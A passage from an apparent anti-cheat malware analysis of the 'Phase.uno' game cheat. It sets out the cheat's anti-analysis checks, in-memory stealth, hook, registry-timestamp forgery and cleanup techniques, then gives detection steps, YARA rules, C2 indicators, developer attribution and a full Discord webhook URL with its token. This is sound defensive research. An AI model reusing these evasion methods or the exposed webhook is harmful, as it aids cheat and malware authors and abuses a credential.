regmon.exe filemon.exe apimonitor-x64.exe apimonitor-x86.exe cheatengine.exe cheatengine-x86\_64.exe cheatengine-i386.exe cheatengine-x86\_64-sse4-avx2.exe scylla.exe scylla\_x64.exe scylla\_x86.exe reclass.net.exe reclass.exe megadumper.exe extremedumper.exe dumpit.exe pe-bear.exe pestudio.exe exeinfope.exe die.exe diel.exe hxd.exe hxd32.exe hxd64.exe reshacker.exe cff explorer.exe cffexplorer.exe 010editor.exe winhex.exe lordpe.exe ppee.exe volatility.exe extremeinjector.exe dll\_injector.exe injector.exe xenos64.exe xenos.exe blackbone.exe kdmapper.exe frida.exe frida-server.exe frida-ps.exe frida-trace.exe frida-discover.exe fakenet.exe fakenet-ng.exe sandboxie.exe sbiectrl.exe sbiesvc.exe sandman.exe vboxservice.exe vboxtray.exe vmtoolsd.exe prl\_tools.exe joeboxcontrol.exe joeboxserver.exe ### Window titles & class names checked Process Hacker Process Explorer Process Monitor Process Monitor - Sysinternals Process Explorer - Sysinternals HTTP Debugger - HTTPDebuggerPro HTTPDebuggerSvc Charles Web Debugging Proxy IDA - IDA Pro - IDA Free - IDA Home - IDATopLevelWindow TIdaWindow idaabortiondialog Ghidra: Ghidra CodeBrowser Cheat Engine 7 Cheat Engine 6 CheatEngine TCEForm TMainCEForm TfrmAutoInject CEJVMHOTKEY1272 Detect It Easy v ReClass.NET - Extreme Injector ExtremeInjector WinDbgFrameClass WinBaseClass Fiddler Everywhere Burp Suite CFF Explorer - Qt5QWindowIcon Qt5QWindowOwnDC OLLYDBG Immunity PhMainWindowClass SiMainWindowClass PROCEXPL ExploreClass PROCMON\_WINDOW\_CLASS ScyllaMainWindow THxDForm QWidget dotPeek - \[CPU -\ \ ### Named objects, device drivers & mutexes\ \ \\\\.\\ KProcessHackerDevice driver\ \ \\\\.\\ SystemInformerDevice driver\ \ \\\\.\\ INTRUD3RDevice driver\ \ \\\\.\\ EXTREMDevice driver\ \ \\\\.\\ SharpOD\_DrvDevice driver\ \ \\\\.\\ TitanHideDevice driver\ \ \\\\.\\ ScyllaHideDevice driver\ \ \\\\.\\ SbieDrvDevice driver (Sandboxie)\ \ \\\\.\\ ICEEXTDevice driver\ \ ProcessHackerMutantMutex\ \ ScyllaDumpMutexMutex\ \ YOURPROJECTNAMECEMUTEXMutex (Cheat Engine)\ \ FiddlerCoreStartupMutexMutex\ \ RemedyBGMutexMutex\ \ Wireshark-is-running-{Mutex\ \ KProcessHacker2Kernel driver\ \ KProcessHacker3Kernel driver\ \ BlackBoneDrvKernel driver\ \ HTTPDebuggerProService\ \ HTTPDebuggerSvcService\ \ SbieSvcService (Sandboxie)\ \ VBoxSF / VBoxGuestService (VirtualBox)\ \ VMToolsService (VMware)\ \ frida-serverService\ \ ### Hooking frameworks detected\ \ frida-agent\ \ frida-gadget\ \ HookLibraryx64\ \ HookLibraryx86\ \ EasyHook\ \ EasyLoad\ \ minhook\ \ MinHook\ \ cehook\ \ speedhack\ \ allochook\ \ d3dhook\ \ NktHookLib\ \ Deviare\ \ BlackBoneDrv\ \ BlackBone\ \ SharpOD\ \ TitanHide\ \ PhantOm\ \ ScyllaHide\ \ SbieDll\ \ detoured\ \ AsmJit\ \ apimon\ \ ### Directory paths scanned\ \ \\x64dbg\\\ \ \\x32dbg\\\ \ \\ollydbg\\\ \ \\ida pro\\\ \ \\ida free\\\ \ \\cheat engine\\\ \ \\process hacker\\\ \ \\ghidra\\\ \ \\dnspy\\\ \ \\binary ninja\\\ \ \\httpdebugger\ \ \\wireshark\\\ \ \\fiddler\\\ \ \\reclass.net\\\ \ \\extremeinjector\\\ \ \\scyllaHide\\\ \ \\api monitor\\\ \ \\pe-bear\\\ \ \\radare2\\\ \ \\cutter\\\ \ \\windbg\\\ \ \\immunitydebugger\\\ \ The string pediy06 (a Chinese reverse engineering forum handle) is also checked, suggesting the developers monitor for specific researchers.\ \ Native anti-debug APIs used: IsDebuggerPresent, CheckRemoteDebuggerPresent, NtQueryInformationProcess, NtRemoveProcessDebug, NtCreateDebugObject, NtSystemDebugControl, NtSetInformationDebugObject, ZwSetInformationThread.\ \ Named objects checked include \\\\.\\KProcessHacker, \\\\.\\INTRUD3R, ProcessHackerMutant, ScyllaDumpMutex, and YOURPROJECTNAMECEMUTEX (Cheat Engine).\ \ Cleanup & destruct\ ------------------\ \ Phase has a **multi-layered cleanup system** designed to leave zero traces after the user hits destruct. When a user clicks destruct, files will not remain on the PC. The cleanup operates across eight distinct layers:\ \ Complete 8-Layer Cleanup Chain1\. In-memory stealthPE header zero + discardable wipe + TLS2\. WFP filter teardownFwpmFilterDeleteById0 for ALL filters3\. Hook removalNtQSI original bytes restored (per-call)4\. File & registry cleanupDeleteFileW + RegDeleteValueW + shellcode free5\. Registry timestamp forgeNtSetInformationKey + /config/delete + ##logout6\. Overlay cleanupUnmapViewOfFile + CloseHandle + null globals7\. Debug detachmentNtRemoveProcessDebug + ThreadHideFromDebugger8\. Handle & crypto cleanupBCryptDestroyKey + WinHttpClose + CloseServiceHandleResult: zero on-disk artifacts | WFP rules empty | hooks removed | registry timestamps forged\ \ ### Layer 1: In-memory stealth (loader)\ \ Immediately after injection completes, the loader erases evidence of injected modules from the target process memory:\ \ Confirmed stealth strings (loader)\ \ \[stealth\] phase 1: starting post-init stealth (wipe=%d erase=%d)\ \[stealth\] PE headers erased @%p size=0x%zx\ \[stealth\] WriteProcessMemory zero @%p size=0x%zx failed: %lu\ \[stealth\] wiped discardable %.8s @%p size=0x%zx\ \[stealth\] discardable wipe done (%u sections)\ \[stealth\] discardable noaccess failed %.8s: 0x%08lx\ \[stealth\] discardable rw failed %.8s: 0x%08lx\ \[stealth\] header erase ro failed: 0x%08lx\ \[stealth\] header erase rw failed: 0x%08lx\ \[stealth\] phase 1: header erase failed (continuing)\ \[stealth\] phase 1: post-init stealth complete\ \[stealth\] phase 2: TLS callback collection failed (continuing)\ \[stealth\] phase 2: emitting %zu TLS callback(s)\ unmapping image, no stealth applied\ \ * **Phase 1 — PE header zeroing** — uses WriteProcessMemory to zero-fill the MZ/PE header region of remotely mapped modules via NtProtectVirtualMemory (RO → RW → zero-fill → restore). Memory scanners looking for PE signatures will not find the injected module.\ * **Phase 1 — Discardable section wipe** — iterates PE sections marked IMAGE\_SCN\_MEM\_DISCARDABLE, changes protection to RW, zero-fills them, then sets to NOACCESS. Each section is logged by name and address.\ * **Phase 2 — TLS callback collection** — collects and processes TLS callbacks to avoid leaving dangling references. The phase emits a count of processed callbacks.\ * **Unmapping fallback** — if stealth is not applied, the image is unmapped entirely via NtUnmapViewOfSection.\ \ ### Layer 2: WFP filter teardown (bp-shell)\ \ This is the layer the user specifically asked about. Our deep analysis of bp-shell (both variants, embedded at DAT\_14013d400 in the main loader) confirms a **complete WFP cleanup** on DLL\_PROCESS\_DETACH. Every filter created during the session is removed — nothing survives in the WFP rule set.\ \ WFP Complete Teardown Sequence (DLL\_PROCESS\_DETACH)SetEvent(0x180005248)Signal shutdown eventWaitForSingleObject(3000ms)Wait for worker thread exitFUN\_18000126fEnter filter deletion loopFwpmFilterDeleteById0for each ID in std::vectorglobals 0x180005228–0x180005230 (mutex-guarded)loopFwpmEngineClose0 (FUN\_1800018a5)Release WFP engine handleWSACleanupTear down Winsock (DNS resolution)CloseHandle + null globalsFilters deleted (both hardcoded + dynamic)napse.ac → all resolved IPs (v4+v6)detect.ac → all resolved IPs (v4+v6)/config/list domains → all IPsAll stored in same vector — ALL get deletedWFP rule set: EMPTYnetsh wfp show filters will show nothing Phase-relatedBut: Windows Event Log (5157/5152) may retain filter activity records\ \ Complete WFP teardown chain (bp-shell DLL\_PROCESS\_DETACH)\ \ 1\. SetEvent(shutdownEvent @ 0x180005248)\ → wakes worker thread from 300s WaitForSingleObject\ \ 2. WaitForSingleObject(workerThread @ 0x180005240, 0xBB8 = 3000 ms)\ → waits up to 3 seconds for graceful thread exit\ \ 3. FwpmFilterDeleteById0 (FUN\_18000126f, 66 bytes)\ → iterates std::vector of filter IDs\ → vector at globals 0x180005228–0x180005230\ → mutex-guarded (\_Mtx\_lock / \_Mtx\_unlock)\ → EVERY filter deleted: hardcoded + dynamic domains\ \ 4. FwpmEngineClose0 (FUN\_1800018a5, 83 bytes)\ → releases WFP engine handle\ \ 5. WSACleanup (FUN\_1800018a5)\ → tears down Winsock (getaddrinfo resolver)\ \ 6. CloseHandle(workerThread) + null globals\ → zeroes thread handle @ 0x180005240\ → zeroes event handle @ 0x180005248\ \ * **Complete filter deletion** — filters from _both_ hardcoded domains (napse.ac, detect.ac) _and_ dynamic domains fetched from /config/list are stored in the same std::vector and **all get deleted**. Nothing survives in the WFP rule set.\ * **Graceful shutdown** — the shutdown event (manual-reset, at 0x180005248) wakes the 300-second refresh loop. The 3-second wait ensures the worker thread exits cleanly before filter deletion begins.\ * **Thread-safe access** — the filter-id vector is guarded by \_Mtx\_lock / \_Mtx\_unlock wrappers (FUN\_180001220 / FUN\_1800012b1) during both add and delete operations.\ * **Post-teardown state** — after cleanup, netsh wfp show filters will show no Phase-related rules. However, Windows Security Event Log may retain records of filter creation/deletion (Event IDs 5157, 5152) since Phase does not clear event logs.\ * **Crash edge case** — if the host process crashes or the DLL is forcibly unloaded without hitting PROCESS\_DETACH, filters remain orphaned in the kernel's BFE (Base Filtering Engine) until reboot or manual removal. This is the only scenario where WFP artifacts persist.\ \ ### Layer 3: NtQuerySystemInformation hook removal (procexp-hook)\ \ The hook handler at 0x180000400 performs a 4-step VirtualProtect cycle on every call to avoid detection:\ \ * **Per-call temporary removal** — VirtualProtect(NtQSI, 0x20, PAGE\_EXECUTE\_READWRITE) → copy saved 32 bytes back → restore protection → FlushInstructionCache → call original → re-install 12-byte trampoline → VirtualProtect → FlushInstructionCache. Four VirtualProtect calls + two FlushInstructionCache calls per hook invocation.\ * **Installation** (DllMain at 0x180000610) — 3-second Sleep(3000) evasion delay, then copies first 0x20 bytes of NtQSI to a saved buffer, patches with 12-byte MOV RAX / JMP RAX trampoline, sets atomic "installed" flag via xchg.\ * **No permanent DllMain unhook** — the report found no DLL\_PROCESS\_DETACH handler that removes the hook. It remains installed for the lifetime of the host process, but disappears when the process exits.\ \ ### Layer 4: File and registry cleanup (FiveM payload)\ \ * DeleteFileW — deletes cheat-related files from disk (temp files, config, dumped resources)\ * RegDeleteValueW — deletes registry values (confirmed: "registry value deleted successfully", "failed to delete registry value, error code: %ld")\ * FlushFileBuffers — ensures all pending writes are flushed before deletion\ * Temp path cleanup: GetTempPathW / GetTempPath2W used for temp file management and deletion\ * Shellcode memory cleanup: "cleaning up shellcode mem" — frees injection shellcode via NtFreeVirtualMemory after handoff. Full lifecycle strings: "allocating shellcode" → "writing shellcode" → "shellcode done, h\_mod: %p" → "cleaning up shellcode mem"\ * Crypto key destruction: BCryptDestroyKey + BCryptCloseAlgorithmProvider — destroys AES-GCM key material after use\ * Thread sync cleanup: DeleteCriticalSection — destroys critical sections used for inter-thread synchronization\ * Resource dump/delete UI with full user-facing destruct flow: "All those beautiful files will be deleted.", "Delete all", "Remove all", "Delete %d item(s)###DeleteSelected"\ \ ### Layer 5: Registry timestamp manipulation and server-side wipe (loader)\ \ The function at FUN\_140024a90 (524 bytes) dynamically resolves NtSetInformationKey from ntdll.dll and overwrites registry key LastWriteTime values. It is called from the orchestrator at FUN\_140024ca0 (4,230 bytes) which creates keys, writes values, then restores the timestamp to hide modifications.\ \ * NtSetInformationKey(hKey, KeyWriteTimeInformation=0, &fileTime, 8) — opens keys under HKEY\_LOCAL\_MACHINE with KEY\_ALL\_ACCESS (0xF013F), queries original timestamp first via RegQueryInfoKeyW, modifies values, then writes back the original FILETIME. Converted to local time via FileTimeToLocalFileTime + FileTimeToSystemTime for logging. Registry paths include shell command associations built from obfuscated hex constants at runtime.\ * Server-side config wipe via /config/delete endpoint (UTF-16LE string at 0x00910ffa in FiveM module) — tells the C2 server to delete the user's stored configuration and session data\ * identifier removed — HWID/subscription deregistration + ##logout session teardown\ \ ### Layer 6: Overlay and shared memory cleanup (unknown\_24k)\ \ * UnmapViewOfFile (at 0x1800004E7) — unmaps the shared memory view Local\\wisrc (12,400 bytes) when a shared-instance handover occurs or on shutdown\ * CloseHandle (at 0x1800004FF) — closes the file mapping handle, then nulls both global pointers (g\_pSharedMem = 0, g\_hMapping = 0)\ * Shared memory is zero-filled at initialization using SSE movups loop (0x3060 bytes cleared) with mfence memory barrier at 0x1800008BC for cross-thread visibility\ * Overlay window continuously re-applies SetWindowDisplayAffinity(WDA\_EXCLUDEFROMCAPTURE) on every WM\_TIMER tick (~16ms / 60 FPS) — even if an anti-cheat removes the flag, it is immediately reapplied\ \ ### Layer 7: Debug detachment (loader)\ \ Function FUN\_140015a50 performs a complete anti-debug cleanup sequence:\ \ * CheckRemoteDebuggerPresent — exits immediately if a debugger is detected\ * NtQueryInformationProcess (ProcessDebugPort=7, ProcessDebugFlags=0x1f) — checks for debug port attachment\ * **Debug detachment chain**: NtSetInformationDebugObject → NtRemoveProcessDebug → NtClose — modifies, detaches, and destroys the debug object\ * ZwSetInformationThread(ThreadHideFromDebugger=0x12) — hides the current thread from debugger notifications\ * Checks for vehdebug-x86\_64.dll module presence as anti-debug measure\ \ ### Layer 8: Connection and handle cleanup (loader + FiveM)\ \ * BCryptDestroyKey + BCryptCloseAlgorithmProvider — destroys AES-GCM encryption key material\ * WinHttpCloseHandle (5 calls in telemetry function FUN\_140012980) — closes HTTP session, connection, and request handles\ * CloseServiceHandle — closes SCM handles after svchost.exe:Dnscache PID discovery\ * FreeSid — frees the SID allocated for BUILTIN\\Administrators check\ * NtUnmapViewOfSection — unmaps the injected section views from the local process after remote mapping completes\ \ ### What Phase does NOT clean (detection survives)\ \ Our analysis confirmed that Phase does **not** wipe broad system forensic artifacts. There are no imports or strings for Event Log clearing, Prefetch deletion, USN Journal manipulation, browser history wiping, RecentDocs cleanup, or ShimCache/Amcache tampering. This means the following **survive destruct** and can be used for detection:\ \ * **DNS resolver cache** — bp-shell re-resolves napse.ac and detect.ac every 5 minutes. These entries persist in ipconfig /displaydns\ * **Prefetch files** — Windows Prefetch will record execution artifacts if the loader was ever present as a visible process before injection\ * **Amcache / ShimCache** — Application compatibility cache entries survive and record execution timestamps\ * **NTFS USN Journal** — file creation/deletion events for any temporary files written by the FiveM payload will persist in the journal\ * **Registry deleted value remnants** — deleted registry values leave remnants in unallocated hive space recoverable with tools like Registry Explorer or yaru\ * **Registry timestamp anomalies** — while Phase manipulates timestamps with NtSetInformationKey, the restored timestamps may not match surrounding key patterns, creating forensic anomalies\ * **WFP audit events** — despite bp-shell's complete filter cleanup, Windows Security Event Log may retain records: Event ID 5157 (WFP blocked a connection), Event ID 5152 (WFP dropped a packet), Event ID 5031 (WFP blocked application). These are written to the log in real-time during operation and Phase does not clear event logs. Audit policy must be enabled to capture these.\ * **Network connection logs** — firewall logs, router logs, and ISP records of connections to us1.phase.uno / us2.phase.uno are outside the cheat's reach\ * **Discord LevelDB access timestamps** — file access timestamps on Discord's LevelDB directories may show anomalous reads from a non-Discord process\ * **Process memory dump artifacts** — if a dump was taken while the cheat was active (as in our recovered 686 MB Spotify dump), the full payload is preserved\ \ Detection guidance for PC checkers\ ----------------------------------\ \ The following detection opportunities are available. Items marked **(live only)** require catching the cheat while active.\ \ 01\ \ WFP filter audit (live only)\ \ Run 'netsh wfp show filters'. Look for filter rules named 'bp-shell block v4' or 'bp-shell block v6' blocking IPs associated with anti-cheat domains (napse.ac, detect.ac). These appear to come from svchost.exe due to system process injection. Note: Phase performs complete WFP cleanup on exit (FwpmFilterDeleteById0 for all stored filter IDs), so these filters only exist while the cheat is active.\ \ 02\ \ NtQuerySystemInformation hook check (live only)\ \ Examine the first 12 bytes of NtQuerySystemInformation in ntdll.dll. A MOV RAX / JMP RAX trampoline (48 B8 xx xx xx xx xx xx xx xx FF E0) indicates an inline hook.\ \ 03\ \ Shared memory object (live only)\ \ Look for a named memory-mapped file 'Local\\wisrc' — 12,400 bytes with magic bytes 'NAIL' (0x4C41494E) at offset 0. This is the overlay's IPC channel.\ \ 04\ \ Window class inspection (live only)\ \ A window with class name 'NVIDIA GeForce RTX 5060' that has WDA\_EXCLUDEFROMCAPTURE display affinity and is NOT created by a genuine NVIDIA process. Use EnumWindows + GetClassName + GetWindowDisplayAffinity.\ \ 05\ \ DNS cache residue\ \ Run 'ipconfig /displaydns'. Bp-shell re-resolves napse.ac and detect.ac every 5 minutes. These lookups persist in the DNS resolver cache even after destruct.\ \ 06\ \ System process module audit (live only)\ \ Inspect loaded modules in svchost.exe, RuntimeBroker.exe, SearchIndexer.exe, SearchHost.exe, dwm.exe, and ctfmon.exe. Unknown DLLs or suspicious memory regions in these processes indicate injection.\ \ 07\ \ PE structure anomalies\ \ Look for modules with OriginalFirstThunk set to 0xFFFFFFFF (corrupted import table), executable code in PE header slack space (before first section), or custom sections named .hookstu, .retplne, .fptable.\ \ 08\ \ PDB path artifacts\ \ Search for PDB paths containing '\\fff\\', '\\hxfd\\', or project names: phase-shellcodes, procexp-hook, Senata. These are developer artifacts baked into the binaries.\ \ 09\ \ Registry forensics\ \ Phase uses NtSetInformationKey to manipulate timestamps and RegDeleteValueW to clean up. Deleted value remnants in unallocated hive space and last-write timestamp anomalies can survive cleanup. Use Registry Explorer or yaru for recovery.\ \ 10\ \ Network connections\ \ Check for connections to us1.phase.uno, us2.phase.uno, restrain.ing, neglect.ing, or API endpoints /auth/v1, /download/v1, /config/list, /telemetry/v1, /config/delete. Secondary C2 uses port 8443.\ \ 11\ \ Spotify/host process memory analysis\ \ Dump the memory of Spotify.exe (or other suspected host processes) and scan for Phase artifacts: strings containing 'us1.phase.uno', 'bp-shell', 'SeDebugPrivilege', PE headers in non-module memory regions, or the shared memory name 'Local\\wisrc'. A Phase-infected Spotify process will have a significantly larger working set than normal.\ \ YARA rules\ ----------\ \ Eight detection rules were produced from our analysis, incorporating strings and patterns from all eight modules. The first six detect live modules (on disk, in memory dumps, or in process memory). The last two detect **post-destruct artifacts** — traces that survive Phase's cleanup. These rules are designed to detect what's actually left behind.\ \ Phase\_Loader.yarDetects the main loader (live or in memory dump)\ \ rule Phase\_Loader {\ meta:\ description = "Phase.uno cheat loader"\ author = "Clubhouse AC Research"\ date = "2026-06-19"\ \ strings:\ $s1 = "\[map\] section mapped: local=%p remote=%p size=0x%zx" ascii\ $s2 = "\[stealth\] phase 1: header erase failed (continuing)" ascii\ $s3 = "\[bp-shell\] WFP engine opened" ascii\ $s4 = "session\_token missing from /handshake response" ascii\ $s5 = "success: injected into pid %u" ascii\ $s6 = "svchost.exe:Dnscache" wide\ $c2a = "us1.phase.uno" ascii wide\ $c2b = "restrain.ing" ascii wide\ $c2c = "neglect.ing" ascii wide\ $g1 = "grcWindow" ascii wide\ $g2 = "Respawn001" ascii wide\ \ condition:\ (uint16(0) == 0x5A4D or uint16(0) == 0x444D) and\ (2 of ($s\*) or (any of ($c2\*) and any of ($g\*)))\ }\ \ Phase\_FiveM\_Payload.yarDetects the FiveM injected payload\ \ rule Phase\_FiveM\_Payload {\ meta:\ description = "Phase.uno FiveM cheat payload"\ author = "Clubhouse AC Research"\ date = "2026-06-19"\ \ strings:\ $hook1 = "aimbot\_input\_hook" ascii\ $hook2 = "c\_event\_gun\_shot\_hook" ascii\ $hook3 = "player\_sector\_pos\_data\_node\_hook" ascii\ $hook4 = "player\_appearance\_data\_node\_hook" ascii\ $ac1 = "anticheat:weaponViolation" ascii\ $ac2 = "anticheat:pedModelViolation" ascii\ $sec1 = ".hookstu" ascii\ $sec2 = ".retplne" ascii\ $sec3 = ".fptable" ascii\ $clean = "cleaning up shellcode mem" ascii\ $dest = "All those beautiful files will be deleted." ascii\ \ condition:\ uint16(0) == 0x5A4D and\ (3 of ($hook\*) or all of ($ac\*) or 2 of ($sec\*) or ($clean and $dest))\ }\ \ Phase\_BPShell\_WFP.yarDetects the WFP domain blocker\ \ rule Phase\_BPShell\_WFP {\ meta:\ description = "Phase.uno WFP anti-cheat domain blocker"\ author = "Clubhouse AC Research"\ date = "2026-06-19"\ \ strings:\ $s1 = "\[bp-shell\] WFP engine opened" ascii\ $s2 = "napse.ac" ascii wide\ $s3 = "detect.ac" ascii wide\ $s4 = "fwpuclnt.dll" ascii wide\ $pdb = "phase-shellcodes" ascii\ \ condition:\ uint16(0) == 0x5A4D and 2 of them\ }\ \ Phase\_ProcExpHook.yarDetects the process-hiding hook\ \ rule Phase\_ProcExpHook {\ meta:\ description = "Phase.uno NtQuerySystemInformation process hider"\ author = "Clubhouse AC Research"\ date = "2026-06-19"\ \ strings:\ $pdb = "procexp-hook" ascii\ $api = "NtQuerySystemInformation" ascii\ $ntdll = "ntdll.dll" ascii wide\ $tramp = { 48 B8 ?? ?? ?? ?? ?? ?? ?? ?? FF E0 }\ \ condition:\ uint16(0) == 0x5A4D and ($pdb or ($api and $tramp))\ }\ \ Phase\_Overlay.yarDetects the streamproof overlay\ \ rule Phase\_Overlay {\ meta:\ description = "Phase.uno transparent overlay module"\ author = "Clubhouse AC Research"\ date = "2026-06-19"\ \ strings:\ $api1 = "SetWindowDisplayAffinity" ascii\ $api2 = "DwmExtendFrameIntoClientArea" ascii\ $api3 = "CreateFileMappingA" ascii\ $shm = "Local\\\\wisrc" ascii\ $nail = { 4E 41 49 4C }\ \ condition:\ (uint16(0) == 0x5A4D or uint16(0) == 0x0000) and\ ($shm or ($nail and 2 of ($api\*)))\ }\ \ Phase\_NvidiaPatcher.yarDetects the NVIDIA display affinity patcher\ \ rule Phase\_NvidiaPatcher {\ meta:\ description = "Phase.uno NVIDIA display affinity patcher"\ author = "Clubhouse AC Research"\ date = "2026-06-19"\ \ strings:\ $pdb = "Senata\\\\nvidia" ascii\ $pdb2 = "patcher.pdb" ascii\ $api1 = "GetWindowDisplayAffinity" ascii\ $u32 = "user32.dll" wide\ // Obfuscated import descriptor: DLL-name field reads ".tex" (0x7865742E)\ $obf = { 2E 74 65 78 00 00 00 00 }\ \ condition:\ uint16(0) == 0x5A4D and ($pdb or $pdb2 or ($api1 and $obf))\ }\ \ Phase\_MemoryDump\_Artifacts.yarDetects Phase in process memory dumps (post-injection)\ \ rule Phase\_MemoryDump\_Artifacts {\ meta:\ description = "Phase.uno artifacts in process memory dumps"\ author = "Clubhouse AC Research"\ date = "2026-06-19"\ note = "Scan .dmp files and raw memory captures"\ \ strings:\ $c2a = "us1.phase.uno" ascii wide\ $c2b = "us2.phase.uno" ascii wide\ $c2c = "restrain.ing" ascii wide\ $c2d = "neglect.ing" ascii wide\ $auth = "/auth/v1" ascii\ $dl = "/download/v1" ascii\ $shm = "Local\\\\wisrc" ascii\ $nail = "NAIL" ascii\ $svc = "svchost.exe:Dnscache" wide\ $map = "\[map\] section mapped" ascii\ $stlth = "\[stealth\] phase 1" ascii\ $bp = "\[bp-shell\]" ascii\ $inj = "success: injected into pid" ascii\ $debug = "SeDebugPrivilege" wide\ $hook = "procexp-hook" ascii\ $tele = "Phase Telemetry/1.0" ascii\ \ condition:\ 3 of them\ }\ \ Phase\_PostDestruct\_Registry.yarDetects registry artifacts surviving Phase destruct\ \ rule Phase\_PostDestruct\_Registry {\ meta:\ description = "Phase.uno post-destruct registry manipulation traces"\ author = "Clubhouse AC Research"\ date = "2026-06-19"\ note = "Scan exported registry hives or raw hive files"\ \ strings:\ $r1 = "restore: NtSetInformationKey" wide ascii\ $r2 = "restore: RegOpenKeyExW" wide ascii\ $r3 = "registry value deleted successfully" ascii\ $r4 = "failed to delete registry value" ascii\ $r5 = "/config/delete" wide ascii\ $r6 = "identifier removed" ascii\ $r7 = "cleaning up shellcode mem" ascii\ $r8 = "All those beautiful files will be deleted" ascii\ \ condition:\ 2 of them\ }\ \ Indicators of compromise\ ------------------------\ \ ### File hashes (SHA-256)\ \ | Module | SHA-256 |\ | --- | --- |\ | Loader | bb7ed6a952c5738c786dd63a3fbe503ff2ecddc0d1ee6204c1cea504fd7982fc |\ | FiveM payload | c4e7ee26c783e2f1090b6c9173f5177fe65bac15d7fa9f5e7831f4ac67de7d63 |\ | bp-shell (A) | 0bcdeb52e3d700ae442a24554bfe2c56b1327d1e6e836432bcc587e9c1f98d39 |\ | bp-shell (B) | 521d79657ac53bedc313bbb2c9ebcaafc10cb4eac00ce77e85e839e6ba373291 |\ | nvidia\_patcher | b60f1c74e9880015202e172c34c0ab48052fa58b7cdd429924daf735a6201702 |\ | procexp-hook | 11136cc665f7d86586397076ef5ff47655f1e4d2867f9e5c0a300766fd9af176 |\ | unknown\_135k | ab95414ac5c6a5de6fc9e438506fe878fd938fb83bc56eda5e2093bf9af3b9fc |\ | unknown\_24k | 9d97529cd1de11ab2c86e68b07b1b50f77862f6170bc5a5bad1a09fa6cb8e6ae |\ | Spotify DMP (host) | 0285239edcb14ca7bc17ece642cd30d073cb6e593da29e747fba7e61168da52a |\ \ ### Network indicators\ \ | Type | Indicator | Context |\ | --- | --- | --- |\ | Domain | us1.phase.uno | Primary C2 (port 443) |\ | Domain | us2.phase.uno | Secondary C2 (port 8443) |\ | Domain | restrain.ing | Tertiary C2 failover (port 443) |\ | Domain | neglect.ing | Quaternary C2 failover (port 443) |\ | URL | /auth/v1 | Authentication |\ | URL | /download/v1 | Payload download |\ | URL | /config/list | WFP blocklist |\ | URL | /telemetry/v1 | Telemetry |\ | URL | /config/delete | Config cleanup |\ | URL | /handshake | Session handshake |\ | Domain | napse.ac | Blocked AC domain |\ | Domain | detect.ac | Blocked AC domain |\ | Domain | api.ipify.org | External IP check |\ | Webhook | discord.com/api/webhooks/1506075252847808543/... | Telemetry exfil |\ | User-Agent | Mozilla/5.0 ...rv:124.0 ...Firefox/124.0 | Spoofed browser UA |\ | User-Agent | Phase Telemetry/1.0 | Telemetry endpoint UA |\ | PDB path | C:\\Users\\fff\\Desktop\\phase-server\\cpp-loader\\... | Main loader |\ | PDB path | C:\\Users\\fff\\Documents\\GitTea\\phase-shellcodes\\... | bp-shell |\ | PDB path | C:\\Users\\fff\\Desktop\\Senata\\nvidia\\... | nvidia\_patcher |\ | PDB path | C:\\Users\\hxfd\\source\\repos\\procexp-hook\\... | procexp-hook |\ | PDB path | C:\\Users\\hxfd\\...\\phase-fivem\\... | FiveM module |\ \ ### Behavioral indicators\ \ * Non-system process calling FwpmFilterAdd0 to block anti-cheat IPs (WFP filters named "bp-shell block v4/v6")\ * NtCreateSection + dual NtMapViewOfSection + NtCreateThreadEx from non-system process\ * WriteProcessMemory zero-fill on MZ/PE header region of remotely mapped section (stealth phase 1)\ * SuspendThread + GetThreadContext + SetThreadContext (RIP redirect) + ResumeThread on game thread\ * 12-byte inline hook on NtQuerySystemInformation in ntdll (48 B8 xx xx xx xx xx xx xx xx FF E0)\ * Topmost layered window with WDA\_EXCLUDEFROMCAPTURE + class "NVIDIA GeForce RTX 5060" reapplied every ~16ms\ * Named file mapping Local\\wisrc between overlay and renderer modules (magic "NAIL" 0x4C41494E)\ * File access to %APPDATA%\\Discord\\Local Storage\\leveldb\\ (and canary/ptb variants) by non-Discord process\ * FiveM hooks on anticheat:weaponViolation / anticheat:pedModelViolation events\ * Spotify.exe process with abnormally high memory (686+ MB) containing PE artifacts not part of Spotify\ * OpenSCManagerW + OpenServiceW("Dnscache") + QueryServiceStatusEx from non-system process\ * NtSetInformationKey(KeyWriteTimeInformation=0) from non-system process — registry timestamp forgery\ * NtRemoveProcessDebug + NtSetInformationDebugObject from non-debugger process — debug detachment\ * ZwSetInformationThread(ThreadHideFromDebugger=0x12) — thread concealment\ * CryptUnprotectData calls from non-browser process (credential theft via DPAPI)\ * Connections to restrain.ing or neglect.ing on port 443 (C2 failover domains)\ \ Developer attribution\ ---------------------\ \ Two developer usernames are embedded in PDB (debug symbol) paths across the suite. A third Windows username appears only in a file path reference.\ \ | Username | Modules | PDB paths |\ | --- | --- | --- |\ | fff | Main loader, bp-shell, nvidia\_patcher | C:\\Users\\fff\\Desktop\\phase-server\\cpp-loader\\x64\\Release\\loader.pdb
C:\\Users\\fff\\Documents\\GitTea\\phase-shellcodes\\x64\\Release\\bp-shell.pdb
C:\\Users\\fff\\Desktop\\Senata\\nvidia\\x64\\Release\\patcher.pdb |\ | hxfd | procexp-hook, FiveM payload | C:\\Users\\hxfd\\source\\repos\\procexp-hook\\x64\\Release\\procexp-hook.pdb
C:\\Users\\hxfd\\Documents\\GitHub\\phase-backend\\phase-module\\phase-fivem\\bin\\Release\\fivem\_external\_beta.pdb |\ | jeffc | (referenced path only) | C:\\Users\\jeffc\\AppData\\Roaming\\Spotify\\Spotify.exe (inside FiveM DLL) |\ \ ### Compile timestamps\ \ | Module | Compile date | Linker |\ | --- | --- | --- |\ | Main loader | 2026-05-24 22:45:54 UTC | MSVC 14.42 (VS 2022) |\ | bp-shell (embedded) | 2026-05-11 22:53:59 UTC | MSVC 14.35-14.36 (VS 2022 17.5) |\ | FiveM payload | 2026-06-15 18:59:43 UTC | MSVC 14.0 |\ \ The embedded bp-shell was compiled 13 days before the main loader, confirming it is a pre-built component linked in. The loader's CODEVIEW debug directory shows Age=178, indicating 178 incremental rebuilds during development. A custom embedded font has a FontForge build date of January 22, 2026, providing an earlier development timeline marker.\ \ ### Infrastructure\ \ Developer fff uses a self-hosted Gitea instance for phase-shellcodes and desktop folders for phase-server and Senata projects. Developer hxfd uses GitHub (phase-backend repo) alongside local Visual Studio repos. The C2 infrastructure uses \*.phase.uno domains with failover to restrain.ing and neglect.ing.\ \ ### Discord infrastructure\ \ A hardcoded Discord webhook is used for telemetry exfiltration: /api/webhooks/1506075252847808543/YVB5hF6Pd396CjG1zRpHZicbxD0UcB2KsKJQOINI70fPPiudcPWToXzyrlido7NLdA2f. A Discord CDN avatar URL references user ID 